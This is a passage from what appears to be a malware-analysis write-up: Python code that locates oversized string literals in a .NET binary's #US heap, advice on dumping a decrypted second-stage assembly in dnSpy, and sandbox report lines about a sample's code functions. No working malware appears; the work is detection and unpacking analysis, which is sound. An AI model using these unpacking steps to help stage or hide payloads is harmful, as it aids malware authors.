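    b = buf[pos]
    if b & 0x80 == 0:
        return b, pos + 1
    if b & 0xC0 == 0x80:
        return ((b & 0x3F) << 8) | buf[pos + 1], pos + 2
    if b & 0xE0 == 0xC0:
        return (((b & 0x1F) << 24) | (buf[pos + 1] << 16)
                | (buf[pos + 2] << 8) | buf[pos + 3]), pos + 4
    raise ValueError("invalid compressed integer at offset %d" % pos)

def iter_user_strings(us_heap):
    """Yield (heap_offset, text) for each blob in a #US heap. A blob is a compressed byte
    length followed by UTF-16LE text plus one trailing flag byte (counted in the length)."""
    pos = 1                                   # offset 0 holds the mandatory empty blob
    while pos < len(us_heap):
        length, start = read_compressed_uint(us_heap, pos)
        if length:
            text = us_heap[start:start + length - 1].decode("utf-16-le", errors="replace")
            yield pos, text
        pos = start + length

def long_user_strings(us_heap, min_chars=4096):
    """(offset, char count) of literals large enough to be an embedded payload."""
    return [(off, len(s)) for off, s in iter_user_strings(us_heap) if len(s) >= min_chars]

def _rva_to_offset(pe, rva):
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    for i in range(nsections):
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", pe, table + 40 * i + 8)
        if vaddr <= rva < vaddr + max(vsize, rawsize):
            return rva - vaddr + rawptr
    raise ValueError("RVA 0x%X is outside every section" % rva)

def extract_us_heap(pe):
    """Walk PE -> CLI header (data directory 14) -> metadata root -> '#US' stream."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    datadir = opt + (96 if magic == 0x10B else 112)        # PE32 vs PE32+
    cli_rva = struct.unpack_from("<I", pe, datadir + 14 * 8)[0]
    if not cli_rva:
        raise ValueError("no CLI header: not a .NET image")
    cli = _rva_to_offset(pe, cli_rva)
    md_rva, md_size = struct.unpack_from("<II", pe, cli + 8)
    md = _rva_to_offset(pe, md_rva)
    if pe[md:md + 4] != b"BSJB":
        raise ValueError("bad metadata signature")
    version_len = struct.unpack_from("<I", pe, md + 12)[0]   # already padded to 4 bytes
    p = md + 16 + version_len
    nstreams = struct.unpack_from("<H", pe, p + 2)[0]
    p += 4
    for _ in range(nstreams):
        off, size = struct.unpack_from("<II", pe, p)
        name_end = pe.index(b"\x00", p + 8)
        name = pe[p + 8:name_end].decode("ascii")
        p = p + 8 + ((name_end - (p + 8) + 1 + 3) & ~3)      # name is NUL-padded to 4 bytes
        if name == "#US":
            return pe[md + off:md + off + size]
    raise ValueError("no #US stream")

# --- constructed sample input (not bytes taken from the report's binary) -------------------
def _compress_uint(v):
    if v < 0x80:
        return bytes([v])
    if v < 0x4000:
        return bytes([0x80 | (v >> 8), v & 0xFF])
    return bytes([0xC0 | (v >> 24), (v >> 16) & 0xFF, (v >> 8) & 0xFF, v & 0xFF])

def build_us_heap(strings):
    """Assemble a #US heap from Python strings (used only to construct the sample)."""
    heap = bytearray(b"\x00")
    for s in strings:
        data = s.encode("utf-16-le") + b"\x00"
        heap += _compress_uint(len(data)) + data
    return bytes(heap)

# 38272 matches the literal length the report found in Forms/mainForm.cs; the content is filler.
SAMPLE_HEAP = build_us_heap(["mainForm", "A" * 38272, "ok"])

if __name__ == "__main__":
    for off, n in long_user_strings(SAMPLE_HEAP):
        print("suspicious literal at #US offset 0x%X: %d chars" % (off, n))
    # Against a real file: long_user_strings(extract_us_heap(open(path, "rb").read()))
```

A literal this size that is also consumed by CreateDecryptor is the hand-off point for the next stage; dumping the decrypted buffer at the Assembly.Load(byte[]) call (for example with a breakpoint in dnSpy) yields the second-stage assembly that the 0.2/6.2 unpack entries above were carved from.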
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041B3B5 push eax; ret 6_2_0041B408
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041B46C push eax; ret 6_2_0041B472
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041B402 push eax; ret 6_2_0041B408
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041B40B push eax; ret 6_2_0041B472
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050DD0D1 push ecx; ret 20_2_050DD0E4
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EDBA79 push 67258780h; ret 20_2_02EDBA7E
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EDB3B5 push eax; ret 20_2_02EDB408
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EC0008 push edx; retf 20_2_02EC0009
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EDC16B pushad ; ret 20_2_02EDC171
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EDB46C push eax; ret 20_2_02EDB472
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EDB40B push eax; ret 20_2_02EDB472
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EDB402 push eax; ret 20_2_02EDB408
          Source: tgamf4XuLa.exe | Static PE information: 0x960770CE [Tue Oct 5 18:07:10 2049 UTC]
          Source: initial sample | Static PE information: section name: .text entropy: 7.16093944862